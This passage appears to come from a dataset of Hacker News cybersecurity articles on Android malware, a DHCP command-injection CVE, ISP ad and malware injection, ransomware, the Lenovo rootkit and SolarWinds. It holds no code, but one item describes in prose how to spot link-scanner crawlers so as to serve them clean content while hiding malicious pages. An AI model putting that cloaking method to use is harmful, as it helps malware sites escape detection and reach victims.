Libssh. The Libssh team addressed the issue with the release of its updated libssh versions 0.8.4 and 0.7.6 on Tuesday, and the details of the vulnerability were also released at the same time. If you have Libssh installed on your website, and mainly if you are using the server component, you are highly recommended to install the updated versions of Libssh as soon as possible. ",Vulnerability Android Malware uses Google Cloud Messaging Service; infected over 5 Million Devices,https://thehackernews.com/2013/08/Android-Malware-Google-Cloud-Messaging-mohit-Kaspersky.html,"The Kaspersky Lab researchers recently have discovered a number of Android malware apps are abusing the Google Cloud Messaging Service (GCM) as Command and Control server. The GCM service allows Android app developers to send messages using JSON Format for installed apps, but hackers exploited it for malicious Purposes. Using Google Cloud Messaging Service (GCM) as Command and Control server for Android Malware is not a new concept, as last year Security researcher and Hacker 'Mohit Kumar' demonstrated 'Android Malware Engine' - One of the Most Sophisticated Android malware during Malcon conference. The Kaspersky Lab researchers have detected at least five Different Android Trojans that used JSON format: 1. SMS.AndroidOS.FakeInst.a 2. SMS.AndroidOS.Agent.ao 3. SMS.AndroidOS.OpFake.a 4. Backdoor.AndroidOS.Maxit.a 5. SMS.AndroidOS.Agent.az. The authors of the malware in Every case took advantage of Google Cloud Messaging Service to Exchange messages between C&C services and the malicious app. Once Gained a Google Cloud Messaging Service (GCM) ID, malware updates are distributed exploiting directly the Google cloud services and also any Command to the malicious agent is sent is exploiting the service and using JSON format. Google Cloud Messaging Service (GCM) act as Command and Control server for the Trojans, which makes the malware updates as the official Updates via Google. ""Furthermore, The execution of commands received from the Google Cloud Messaging Service GCM is performed by the GCM system and it is impossible to block them Directly on an infected device. The only way to cut this channel off From virus writers is to block developer accounts with IDs linked to the Registration of malicious programs."" SMS.AndroidOS.FakeInst.a Is the most diffused agent, according Kaspersky experts more than 4,800,000 installers have been detected and around 160000 attempted Installation was blocked in 2012. ""It Can send text messages to premium numbers, delete incoming text Messages, generate shortcuts to malicious sites, and display Notifications advertising other malicious programs that are spread under The guise of useful applications or games"" states the Kaspersky blog Post. SMS.AndroidOS.Agent.ao is presented as a porn app and has the primary intent to send messages to premium numbers, meanwhile the SMS.AndroidOS.OpFake.a malware is the typical SMS malicious application of which have been detected also more than 1 million installers. This last malware is also able to steal Sensitive information from the victim's handset such as contacts and it is also able to self-update its code, the agent appeared very active And was detected in 97 different countries, the majority in Russia and Eastern countries. The Kaspersky team has blocked more than 60,000 Attempted installs, it sends several commands from both the GCM and its Own C&C servers such as: Sending premium text messages to a specified number Sending text messages Performing self-updates Stealing text messages Deleting incoming text messages that meet the criteria set by the C&C Theft of contacts Replacing the C&C or GCM numbers Stopping or restarting its operations Backdoor.AndroidOS.Maxit trojan was very dated, first instance was detected in late 2011 and Appears to be continuously updated, today the experts counted more than 40 different variants most often in Malaysia, Thailand, the Philippines And Burma. ""All of These modifications are very similar to one another,"" ""the app opens Websites with games, while malicious operations are executed in the Background."" It has been found most often in Malaysia, but also in Thailand, the Philippines and Burma. ""The The first thing the backdoor sets out to do is collect information about The phone and the SIM card, including the phone number and the mobile Provider. All of this data is uploaded to the androidproject.imaxter.net C&C. This is the server that manages all of the Trojan's primaries Functions."" The Last trojan, SMS.AndroidOS.Agent.az., was detected for the first time in May 2012 and is a shell app for a Vietnamese porn website which is able Also to send text messages to a premium number. The number of malware that exploits the Google Cloud Messaging Service is Destined to increase despite it is still relatively low, the data on Their diffusion demonstrated it. These malware are prevalent in Western Europe, the CIS, and Asia, virus writers know very well that execution Off commands received from GCM is performed by the Google Cloud Messaging Service system and it is impossible to block them directly on an Infected device. Actually The only option for security experts is to block developer accounts With IDs linked to the registration of malicious applications. ",Malware Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks,https://thehackernews.com/2018/05/linux-dhcp-hacking.html,"A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux and its derivatives like Fedora operating system. The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems. Whenever your system joins a network, it's the DHCP client application which allows your system to automatically receive network configuration parameters, such as an IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server. The vulnerability resides in the NetworkManager integration script included in the DHCP client packages which is configured to obtain network configuration using the DHCP protocol. Felix Wilhelm from the Google security team found that attackers with a malicious DHCP server, or connected to the same network as the victim, can exploit this flaw by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim's system running vulnerable DHCP client. Although full details of the vulnerability have not been released, Wilhelm claims his PoC exploit code is so short in length that it even can fit in a tweet. Meanwhile, Barkın Kılıç, a security researcher from Turkey, has released a tweetable proof-of-concept exploit code for the Red Hat Linux DHCP client vulnerability on Twitter. In its security advisory, Red Hat has confirmed that the vulnerability impacts Red Hat Enterprise Linux 6 and 7, and that all of its customers running affection versions of the dhclient package should update their packages to the newer versions as soon as they are available. ""Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,"" Red Hat warns. Fedora has also released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28. Other popular Linux distributions like OpenSUSE and Ubuntu do not appear to be impacted by the vulnerability, as their DHCP client implementation doesn't have NetworkManager integration script by default. ",Vulnerability 2 Hackers Win Over 1 Million Air Miles each for Reporting Bugs in United Airlines,https://thehackernews.com/2016/08/united-airlines-air-miles.html,"Two computer hackers have earned more than 1 Million frequent-flyer miles each from United Airlines for finding and reporting multiple security vulnerabilities in the Airline's website. Olivier Beg, a 19-year-old security researcher from the Netherlands, has earned 1 Million air miles from United Airlines for finding around 20 security vulnerabilities in the software systems of the airline. Last year, Chicago-based 'United Airlines' launched a bug bounty program to invite security researchers and bug hunters for finding and reporting security holes in its websites, software, apps and web portals. Under its bounty program, United Airlines offers a top reward of 1 Million flyer miles for reporting Remote Code Execution (RCE) flaws; 250,000 miles for medium-severity vulnerabilities, and 50,000 flyer miles for low-severity bugs. According to Netherlands Broadcasting Foundation, the 19-year-old reported 20 security issues to United Airlines and the most severe flaw earned the teenager 250,000 air miles. Beg did not reveal the details about the flaws he discovered, but the teenager claims to have reported flaws in software from popular tech companies including Yahoo, Google, and Facebook. Another 23-years-old security researcher from Algeria reported three security issues under the airline's bug bounty program and earned 1.7 Million flyer miles from the United Airlines. Djaballah Mohamed Taher told The Hacker News that he reported Remote Code Execution, authorization bypass and Cross Site Scripting (XSS) flaws to the airline but did not detail the technical aspects given the program's non-disclosure agreement. Last year, Jordan Wiens was the first security researcher to earn United Airlines' top reward of 1 Million Miles for finding a security bug that allowed him to seize control of one of the airline's websites. Bug bounty programs are very common among technology firms, including Google, Microsoft, and Facebook, who offer security researchers hundreds of thousands of dollars as rewards for exposing security weaknesses in their products. Although, it's good to see companies like United Airlines, Tesla, General Motors, Fiat Chrysler, welcoming vulnerability reports from researchers and rewarding them for their work. Apple is the latest to announce the bug bounty program starting this fall to pay outside security researchers and white hat hackers for privately disclosing security issues in its products. The company plans to offer rewards of up to $200,000, though the scope of its program has initially been kept invitation-only targeting a small range of Apple software including iOS and iCloud. ",Vulnerability Chinese ISPs Caught Injecting Ads and Malware into Web Pages,https://thehackernews.com/2016/02/china-hacker-malware.html,"China has gained a considerable global attention when it comes to their Internet policies in the past years; whether it's introducing its own search engine dubbed ""Baidu,"" Great Firewall of China, its homebrew China Operating System (COP) and many more. Along with the developments, China has long been criticized for suspected backdoors in its products: Xiaomi and Star N9500 smartphones are top examples. Now, Chinese Internet Service Providers (ISPs) have been caught red-handed for injecting Advertisements as well as Malware through their network traffic. Three Israeli researchers uncovered that the major Chinese-based ISPs named China Telecom and China Unicom, two of Asia's largest network operators, have been engaged in an illegal practice of content injection in network traffic. Chinese ISPs had set up many proxy servers to pollute the client's network traffic not only with insignificant advertisements but also malware links, in some cases, inside the websites they visit. If an Internet user tries to access a domain that resides under these Chinese ISPs, the forged packet redirects the user's browser to parse the rogue network routes. As a result, the client's legitimate traffic will be redirected to malicious sites/ads, benefiting the ISPs. Here's How Malware and Ads are Injected In the research paper titled 'Website-Targeted False Content Injection by Network Operators,' the Israeli researchers wrote that the tactic has now expanded to core ISPs – the Internet companies that interconnect edge ISPs with the rest of the ISPs globally. These ISPs have set up specialized servers that monitor network traffic for specific URLs and move to alter it, no matter the end users are their customers or not. Methods of Injection: Various methods had been adopted by ISPs to infiltrate the legitimate traffic. Some of them are: 1- Out of Band TCP Injection Unlike in the past when ISPs modified network packages to inject ads, the network operators send the forged packets without dropping the legitimate ones. Interestingly, instead of interception or rewriting of network packets, cloning of HTTP response packets had been adopted by ISPs to replicate the infection. The ISP clones the legitimate traffic, modifies the clone, and then sends both packets to the desired destination. So ultimately, there are 2 packet responses generated for a single request. Hence, there is a chance of forged packet to win the race, while legit packet reaches at last. Since the cloned traffic will not always arrive at the end users before the legitimate one, the injected traffic is harder to detect. But a serious analysis with netsniff-ng would knock out the fake packets. 2) HTTP Injection HTTP is a stateless client-server protocol that uses TCP as its transport. As TCP only accepts the initial packet upon its receival and discards the second, there is a chance to receive the fake packet in first place; if infection had been taken place. Here, the user might get a response with HTTP Status Number 302 (Redirection) instead of HTTP Status Number 200 (OK) and would be re-routed to the other non-legit links. How to Identify Rogue Packets? 1) IP Identification IP identification value does contains a counter that is sequentially incremented after each sent the packet. The forged packet returns soon after making a request that masquerades as a legit packet. But the time stamp in each packet would provide enough evidence to eliminate the rogue packet. The forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets 2) TTL (Total Time to Live) Each received packet contains an initial value set by sender that calculates the number of hops covered by the packet during the transmission. If packet is received with different number of hop counts, then it would clearly draws a line between the legit and illegit ones. The forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets 3) Timing Analysis Time stamp in the packet captured by the monitoring systems at the entrance to the Edge network would figure out the genuinity. The data packet with apparent time close proximity would differentiate the legitimate packets from the forged packets with unmatched arrival time. List of the Infection Groups In general, 14 different ISPs had been discovered with malicious background, and out of these 10 are from China, 2 from malaysia, and 1 each from India and United States. Following are the injection groups and their characteristics: 1. Hao – Referred the user to hao123.com itself, but using an HTTP 302 response mechanism to infect users. 2. GPWA – The genuine website of Gambling had been forged to another web domain which intelligently redirects the traffic to 'qpwa' (sometimes, public would not find the difference between 'q' and 'g'). The forged content here includes a JavaScript that refers to a resource having the same name as the one originally requested by the user, but the forged resource is located at qpwa.org registered to a Romanian citizen. 3. Duba Group – The injections in this group add to the original content of a website a colorful button that prompts the victim to download an executable from a link at the domain duba.net. The executable is flagged as malicious by several antivirus vendors. 4. Mi-img – In these injected sessions, the client, which appears to be an Android device, tries to download an application. The redirected response navigates into an online bot database that had been identified by a BotScout lookup. 5. Server Erased – In this group, the injections were identical to the legitimate response but the original value of the HTTP header 'Server' is changed. Motive Behind the Attack Both the advertising agencies and the ISPs are benefited by redirecting user's traffic to the corresponding sites. This practice would mark an increase in advertisement revenue and other profits to advertisers and ISPs. During their research, the researchers logged massive amounts of Web traffic and detected around 400 injection incidents based on this technique. Most of these events happened with ISPs in China and far east countries, even if the traffic originated from Western countries, meaning a German user accessing a website hosted in China is also susceptible to having his/her traffic injected with ads or malware. How to Mitigate? Since the companies that engage in such practices are edge ISPs - the final network providers that connect users to the Internet, users can change their Internet provider. However, the simplest way to combat this issue is for website operators to support HTTPS for their services, as all the websites that infect users are SSL-less. The sites that supply malicious URLs are not guarded by SSL Shield, making them vulnerable to carry out the illegit things. Therefore, usage of HTTPS-based websites would block such kinds of attacks, so users are advised only to stick to SSL sites. Delivering the illegit content, or redirecting the crowd to stash the cash would end up losing the public trust on the technologies. ",Malware Google Does It Again: Discloses Unpatched Microsoft Edge and IE Vulnerability,https://thehackernews.com/2017/02/google-microsoft-edge-bug.html,"This month has yet been kind of interesting for cyber security researchers, with Google successfully cracked SHA1 and the discovery of Cloudbleed bug in Cloudflare that caused the leakage of sensitive information across sites hosted behind Cloudflare. Besides this, Google last week disclosed an unpatched vulnerability in Windows Graphics Device Interface (GDI) library, which affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10. While the Windows vulnerability has yet to be patched by the company, Google today released the details of another unpatched Windows security flaw in its browser, as Microsoft did not act within its 90-day disclosure deadline. The vulnerability (CVE-2017-0037), discovered and disclosed by Google Project Zero team's researcher Ivan Fratric, is a so-called ""type confusion flaw"" in a module in Microsoft Edge and Internet Explorer that potentially leads to arbitrary code execution. Proof-of-Concept Code Released! This time, with the details of this arbitrary code execution bug, the researcher has also published a proof-of-concept exploit that can crash Edge and IE, opening the door for potential hackers to execute code and gain administrator privileges on the affected systems. Fratric says he successfully ran his PoC code on the 64-bit version of IE on Windows Server 2012 R2, but both 32-bit IE 11, as well as Microsoft Edge, is affected by the same vulnerability. In short, the vulnerability affects all Windows 7, Windows 8.1, and Windows 10 users. You can know more details about the recently disclosed flaw on Google's bug report blog, along with proof-of-concept code that causes a crash of the browsers, though sophisticated hackers can build more dangerous exploits as well. This vulnerability was reported to Microsoft on November 25, and it went public on February 25, after Google Project Zero's 90-day disclosure policy. Three Unpatched, but Already Disclosed Windows Flaws While Microsoft has delayed this month's Patch Tuesday and already has to patch two already disclosed, but unpatched vulnerabilities, it is hard to say if the company actually included a patch for this vulnerability discovered by Google in its next roll out of patches. Yes, Microsoft has to patch two other severe security flaws as well, which have already been publicly disclosed with working exploit code but remain still unpatched, giving hackers enough time to target Windows users. First one is a Windows SMB flaw that affects Windows 8, Windows 10 and Windows Server. The PoC exploit code of this flaw was released almost two weeks ago. The other one is the vulnerability disclosed by Google last week that affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10. Meanwhile, just to remain on the safer side, Windows users are advised to replace their Internet Explorer and Edge browsers with a different one if possible and avoid clicking on suspicious links and websites they do not trust. ",Vulnerability Hackers Steal $19 Million From Bithumb Cryptocurrency Exchange,https://thehackernews.com/2019/03/bithumb-cryptocurrency-hacked.html,"Hackers yesterday stole nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based popular cryptocurrency exchange admitted today. According to Primitive Ventures' Dovey Wan, who first broke the information on social media, hackers managed to compromise a number of Bithumb's hot EOS and XRP wallets and transferred around 3 million EOS (~ $13 million) and 20 million XRP (~ $6 million) to his newly-created accounts. The hacker then distributedly transferred the stolen digital assets to his different accounts created on other cryptocurrency exchanges, including Huobi, HitBTC, WB, and EXmo, via ChangeNow, a non-custodial crypto swap platform does not require KYC/account. Bithumb has been hacked multiple times in the past. Last time the popular cryptocurrency exchange was hacked in June 2018, when hackers stole $31 million, and in July 2017, when hackers stole $1 million worth of EOS from many wallets belonging to its users. ""And this is the second time Bithumb saw a MAJOR hack, last time it was hacked with a loss over $30m.. lol and after the first hack it was STILL able to get the fiat license from Korea and WTF??"" Wan says on Twitter. It has been reported that the private key for the EOS hot wallet account belonging to Bithumb was stolen (address g4ydomrxhege), which allowed the hacker to transfer the funds to his address, ""ifguz3chmamg."" The above image shared by Changpeng Zhao, CEO of Binance cryptocurrency exchange, explains how hacker distributed his funds after stealing it from Bithumb. Here's how the hacker distributed and transferred the stolen funds to his accounts on different exchanges: EXMO: 662,600 Huobi: 263,605 Changelly 143,511 KuCoin: 96,270 CoinSwitch: 38,725 According to a blog post published by the company today, Bithumb is still investigating the hack, which it believes was performed with the help of an insider, and has reported the breach incident to security firm Korea Internet and Security Agency (KISA) and cyber police. ""We deeply apologize to our members for delaying the cryptocurrency deposit and withdrawal service,"" Bithumb said. ""As a result of the inspection, it is judged that the incident is an accident involving insiders because the external intrusion path has not been revealed until now. Based on the facts, we are conducting intensive investigations with KISA, Cyber Police Agency and security companies."" Meanwhile, Bithumb said the company is working with major cryptocurrency exchanges and foundations in hope to recover the loss of the cryptocurrency equivalent. Last year when the exchange was hacked and lost $30 million in EOS, it managed to recover half of the stolen funds. Would Bithumb be able to do the same this time? ",Data_Breaches Facebook content restrictions bypass Vulnerability,https://thehackernews.com/2011/10/facebook-content-restrictions-bypass.html,"Facebook content restrictions bypass Vulnerability Blackhat Academy claims to have found a way to bypass content restrictions on links, as posted on their site and posts put on a user's public wall. Even Security Analysts claim that Facebook was notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011), Facebook has yet to do anything about this. Facebook has only recently purchased Websense to attempt to push this vulnerability under the rug, however the exploit still works.To access Facebook's FQL API, Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. FQL does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious Facebook application or directly on the FQL development api page for information gathering. : While most major sites that allow link submission are vulnerable to this method, sites including Websense, Google+, and Facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistent domain name. Facebook IP addresses resolve to tfbnw.net, also set a custom user agent of ""facebookexternalhit"".Google+ (also notified Jul. 31st and guilty of reasonable care) again follows suit and utilizes ""Feedfetcher-Google"" as their user agent. Knowing this, we can easily filter out requests coming from these websites, and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone that follows the links. Facebook's recent partnership with Websense is laughable, due to Websense's ""ACE"" security scanner that is just as easily identified, by using gethostbyaddr in order to resolve the IP back to websense.com. Utilizing this technique would allow an overwhelming number of malware sites to remain undetected to their automatic site analysis. Other places like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears our server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.Proof of Concept can be seen here. Submitted By : Blackhat Academy ",Vulnerability Windows Remote Assistance Exploit Lets Hackers Steal Sensitive Files,https://thehackernews.com/2018/03/window-remote-assistance.html,"You have always been warned not to share remote access to your computer with untrusted people for any reason—it's a basic cybersecurity advice, and common sense, right? But what if, I say you should not even trust anyone who invites or offer you full remote access to their computers. A critical vulnerability has been discovered in Microsoft's Windows Remote Assistance (Quick Assist) feature that affects all versions of Windows to date, including Windows 10, 8.1, RT 8.1, and 7, and allows remote attackers to steal sensitive files on the targeted machine. Windows Remote Assistance is a built-in tool that allows someone you trust to take over your PC (or you to take remote control of others) so they can help you fix a problem from anywhere around the world. The feature relies on the Remote Desktop Protocol (RDP) to establish a secure connection with the person in need. However, Nabeel Ahmed of Trend Micro Zero Day Initiative discovered and reported an information disclosure vulnerability (CVE-2018-0878) in Windows Remote Assistance that could allow attackers to obtain information to further compromise the victim's system. The vulnerability, which has been fixed by the company in this month's patch Tuesday, resides in the way Windows Remote Assistance processes XML External Entities (XXE). The vulnerability affects Microsoft Windows Server 2016, Windows Server 2012 and R2, Windows Server 2008 SP2 and R2 SP1, Windows 10 (both 32- and 64-bit), Windows 8.1 (both 32- and 64-bit) and RT 8.1, and Windows 7 (both 32- and 64-bit). Exploiting Windows Remote Assistance to Steal Files Since a security patch for this vulnerability is now available, the researcher has finally released technical details and proof-of-concept exploit code for the flaw to the public. In order to exploit this flaw, which resides in MSXML3 parser, the hacker needs to use ""Out-of-Band Data Retrieval"" attack technique by offering the victim access to his/her computer via Windows Remote Assistance. While setting up Windows Remote Assistance, the feature gives you two options—Invite someone to help you and Respond to someone who needs help. Selecting the first option helps users generate an invitation file, i.e. 'invitation.msrcincident,' which contains XML data with a lot of parameters and values required for authentication. Since the parser does not properly validate the content, the attacker can simply send a specially crafted Remote Assistance invitation file containing a malicious payload to the victim, tricking the targeted computer to submit the content of specific files from known locations to a remote server controlled by the attackers. ""The stolen information could be submitted as part of the URL in HTTP request(s) to the attacker. In all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action,"" Microsoft explains. ""This XXE vulnerability can be genuinely used in mass scale phishing attacks targeting individuals believing they are truly helping another individual with an IT problem. Totally unaware that the .msrcincident invitation file could potentially result in loss of sensitive information,"" Ahmed warns. Among patching other critical vulnerabilities fixed this month, Windows users are highly recommended to install the latest update for Windows Remote Assistance as soon as possible. ",Vulnerability Hackers Threaten to Leak D.C. Police Informants' Info If Ransom Is Not Paid,https://thehackernews.com/2021/04/hackers-threaten-to-leak-dc-police.html,"The Metropolitan Police Department (MPD) of the District of Columbia has become the latest high-profile government agency to fall victim to a ransomware attack. The Babuk Locker gang claimed in a post on the dark web that they had compromised the DC Police's networks and stolen 250 GB of unencrypted files. Screenshots shared by the group, and seen by The Hacker News, include various folders containing what appears to be investigation reports, arrests, disciplinary actions, and other intelligence briefings. Also called the DC Police, the MPD is the primary law enforcement agency for the District of Columbia in the U.S. The ransomware gang has given the department three days to heed to their ransom demand or risk leaking sensitive files that could expose police informants to criminal gangs. ""Hello! Even an institution such as DC can be threatened, we have downloaded a sufficient amount of information from your internal networks, and we advise you to contact us as soon as possible, to prevent leakage, if no response is received within 3 days, we will start to contact gangs in order to drain the informants, we will continue to attack the state sector of the usa, fbi csa, we find 0 day before you, even larger attacks await you soon,"" the ransomware group said on their data leak site. Babuk Locker is a relative newcomer in the ransomware landscape, with the group targeting transportation, healthcare, plastic, electronics, and agricultural sectors across the U.S., U.K., U.A.E., China, India, South Africa, Spain, Germany, and Italy at least since the beginning of 2021. The syndicate is also known for attacking Linux-based systems such as VMware ESXi. ""The Babuk gang highlighted the key problem that all organizations face when confronting threats, and that is speed,"" Cymulate CTO Avihai Ben-Yossef said. ""The time it takes for known vulnerabilities to get patched on all systems is too long. Defenders that rely on manual security testing methodologies are unable to match the pace of threat actors in finding security gaps and fixing them."" ",Cyber_Attack Lenovo Caught Using Rootkit to Secretly Install Unremovable Software,https://thehackernews.com/2015/08/lenovo-rootkit-malware.html,"Two years ago Chinese firm Lenovo got banned from supplying equipment for networks of the intelligence and defense services various countries due to hacking and spying concerns. Earlier this year, Lenovo was caught red-handed for selling laptops pre-installed with Superfish malware. One of the most popular Chinese computer manufacturers 'Lenovo' has been caught once again using a hidden Windows feature to preinstall unwanted and unremovable rootkit software on certain Lenovo laptop and desktop systems it sells. The feature is known as ""Lenovo Service Engine"" (LSE) – a piece of code presents into the firmware on the computer's motherboard. If Windows is installed, the LSE automatically downloads and installs Lenovo's own software during boot time before the Microsoft operating system is launched, overwriting Windows operating system files. More worrisome part of the feature is that it injects software that updates drivers, firmware, and other pre-installed apps onto Windows machine – even if you wiped the system clean. So even if you uninstall or delete the Lenovo's own software programs, the LSE hidden in the firmware will automatically bring them back as soon as you power-on or reboot your machine. Users at a number of online forums are criticizing Lenovo for this move and suspecting that the Chinese computer maker has installed a ""bootkit"" that survives a full system wipe-and-reinstall. The issue was first discovered and reported by users back in May when using new Lenovo laptops but was widely reported Tuesday. What these Unwanted Program Does? For Desktops: In case of desktops, Lenovo's own description states that the software doesn't send any personally identifying information, but sends some basic information, including the system model, date, region, and system ID, to a Lenovo server. Moreover, the company claims that this process is done only one-time, sending the information to its server only when a machine first connects to the Internet. For Laptops: However, in case of Laptops, the software does rather more. LSE installs a software program called OneKey Optimizer (OKO) that bundles on many Lenovo laptops. According to the company, the OKO software is used for enhancing computer performance by ""updating the firmware, drivers, and pre-installed apps"" as well as ""scanning junk files and find factors that influence system performance."" OneKey Optimizer falls under the category of ""crapware"". The worst part is that both LSE as well as OKO appears to be insecure. Back in April, security researcher Roel Schouwenberg reported some security issues, including buffer overflows and insecure network connections, to Lenovo and Microsoft. This forced Lenovo to stop including LSE on its new systems that built since June. The company has also provided firmware updates for vulnerable laptops and issued instructions to disable the option on affected machines and clean up the LSE files. Among others, many Flex and Yoga machines running an operating system including Windows 7, Windows 8, and Windows 8.1 are affected by this issue. You can see the full list of affected notebooks and desktops on Lenovo's website. Lenovo has since released an official statement, which notes that the systems made from June onwards have BIOS firmware that eliminates the issue, and it's no longer installing Lenovo Service Engine on PCs. Expert way! How to Remove Lenovo Service Engine (Rootkit) In order to remove LSE from your affected machines, you have to do it manually. Follow these simple steps in order to do so: Know your System Type (whether it's a 32-bit or 64-bit version of Windows) Browse to the Lenovo Security Advisory, and select the link for your specific Lenovo machine. Click the ""Date"" button for the most recent update. Search for ""Lenovo LSE Windows Disabler Tool"" and Click the download icon next to the version that matches your version of Windows. Open the program once it downloads. It will remove the LSE software. ",Malware Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack,https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html,"The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far more wider in scope, sophistication, and impact than previously thought. News of Microsoft's compromise was first reported by Reuters, which also said the company's own products were then used to strike other victims by leveraging its cloud offerings, citing people familiar with the matter. The Windows maker, however, denied the threat actor had infiltrated its production systems to stage further attacks against its customers. In a statement to The Hacker News via email, the company said — ""Like other SolarWinds customers, we have been actively looking for indicators of this actor and can confirm that we detected malicious SolarWinds binaries in our environment, which we isolated and removed. We have not found evidence of access to production services or customer data. Our investigations, which are ongoing, have found absolutely no indications that our systems were used to attack others."" Characterizing the hack as ""a moment of reckoning,"" Microsoft president Brad Smith said it has notified over 40 customers located in Belgium, Canada, Israel, Mexico, Spain, the UAE, the UK, and the US that were singled out by the attackers. 44% of the victims are in the information technology sector, including software firms, IT services, and equipment providers. CISA Issues New Advisory The development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) published a fresh advisory, stating the ""APT actor [behind the compromises] has demonstrated patience, operational security, and complex tradecraft in these intrusions."" ""This threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations,"" it added. But in a twist, the agency also said it identified additional initial infection vectors, other than the SolarWinds Orion platform, that have been leveraged by the adversary to mount the attacks, including a previously stolen key to circumvent Duo's multi-factor authentication (MFA) to access the mailbox of a user via Outlook Web App (OWA) service. Digital forensics firm Volexity, which tracks the actor under the moniker Dark Halo, said the MFA bypass was one of the three incidents between late 2019 and 2020 aimed at a US-based think tank. The entire intrusion campaign came to light earlier this week when FireEye disclosed it had detected a breach that also pilfered its Red Team penetration testing tools. Since then, a number of agencies have been found to be attacked, including the US departments of Treasury, Commerce, Homeland Security, and Energy, the National Nuclear Security Administration (NNSA), and several state department networks. While many details continue to remain unclear, the revelation about new modes of attack raises more questions about the level of access the attackers were able to gain across government and corporate systems worldwide. Microsoft, FireEye, and GoDaddy Create a Killswitch Over the last few days, Microsoft, FireEye, and GoDaddy seized control over one of the main GoDaddy domains — avsvmcloud[.]com — that was used by the hackers to communicate with the compromised systems, reconfiguring it to create a killswitch that would prevent the SUNBURST malware from continuing to operate on victims' networks. For its part, SolarWinds has not yet disclosed how exactly the attacker managed to gain extensive access to its systems to be able to insert malware into the company's legitimate software updates. Recent evidence, however, points to a compromise of its build and software release system. An estimated 18,000 Orion customers are said to have downloaded the updates containing the back door. Symantec, which earlier uncovered more than 2,000 systems belonging to 100 customers that received the trojanized SolarWinds Orion updates, has now confirmed the deployment of a separate second-stage payload called Teardrop that's used to install the Cobalt Strike Beacon against select targets of interest. The hacks are believed to be the work of APT29, a Russian threat group also known as Cozy Bear, which has been linked to a series of breaches of critical US infrastructure over the past year. The latest slew of intrusions has also led CISA, the US Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI) to issue a joint statement, stating the agencies are gathering intelligence in order to attribute, pursue, and disrupt the responsible threat actors. Calling for stronger steps to hold nation-states accountable for cyberattacks, Smith said the attacks represent ""an act of recklessness that created a serious technological vulnerability for the United States and the world."" ""In effect, this is not just an attack on specific targets, but on the trust and reliability of the world's critical infrastructure in order to advance one nation's intelligence agency,"" he added. ",Data_Breaches Warning! Over 900 Million Android Phones Vulnerable to New 'QuadRooter' Attack,https://thehackernews.com/2016/08/hack-android-phone.html,"Android has Fallen! Yet another set of Android security vulnerabilities has been discovered in Qualcomm chipsets that affect more than 900 Million Android smartphones and tablets worldwide. What's even worse: Most of those affected Android devices will probably never be patched. Dubbed ""Quadrooter,"" the set of four vulnerabilities discovered in devices running Android Marshmallow and earlier that ship with Qualcomm chip could allow an attacker to gain root-level access to any Qualcomm device. The chip, according to the latest statistics, is found in more than 900 Million Android tablets and smartphones. That's a very big number. The vulnerabilities have been disclosed by a team of Check Point researchers at the DEF CON 24 security conference in Las Vegas. Critical Quadrooter Vulnerabilities: The four security vulnerabilities are: CVE-2016-2503 discovered in Qualcomm's GPU driver and fixed in Google's Android Security Bulletin for July 2016. CVE-2016-2504 found in Qualcomm GPU driver and fixed in Google's Android Security Bulletin for August 2016. CVE-2016-2059 found in Qualcomm kernel module and fixed in April, though patch status is unknown. CVE-2016-5340 presented in Qualcomm GPU driver and fixed, but patch status unknown. Qualcomm is the world's leading designer of LTE (Long Term Evolution) chipsets with a 65% share of the LTE modem baseband market. If any one of the four flaws is exploited, an attacker can trigger privilege escalations for gaining root access to an affected device. All an attacker needs is to write a piece of malware and send it to the victim. When installed, the malware offers the attacker privilege escalation on the affected devices. According to the researchers, the attack can also be conducted through a malicious app. An attacker needs to trick a user into installing a malicious app that, unlike other malware, would execute without requiring any special permission checks. ""Such an app would require no special permissions to take advantage of these vulnerabilities, alleviating any suspicion users may have when installing,"" Check Point researchers write in a blog post. If any of the four vulnerabilities are successfully exploited, an attacker could gain root access to an affected device, giving the attacker full access to the device, including its data, camera and microphone. List of Affected Devices (Popular) More than 900 Million Android devices that ship with Qualcomm chip are vulnerable to the flaws. Here's the list of some of the popular affected devices, though there are far more devices that are impacted by one or more Quadrooter vulnerabilities. Samsung Galaxy S7 and Samsung S7 Edge Sony Xperia Z Ultra OnePlus One, OnePlus 2 and OnePlus 3 Google Nexus 5X, Nexus 6 and Nexus 6P Blackphone 1 and Blackphone 2 HTC One, HTC M9 and HTC 10 LG G4, LG G5, and LG V10 New Moto X by Motorola BlackBerry Priv How to Check if Your Device is Vulnerable? You can check if your smartphone or tablet is vulnerable to Quadrooter attack using Check Point's free app. Since the vulnerable software drivers, which control communication between Qualcomm chipset components, come 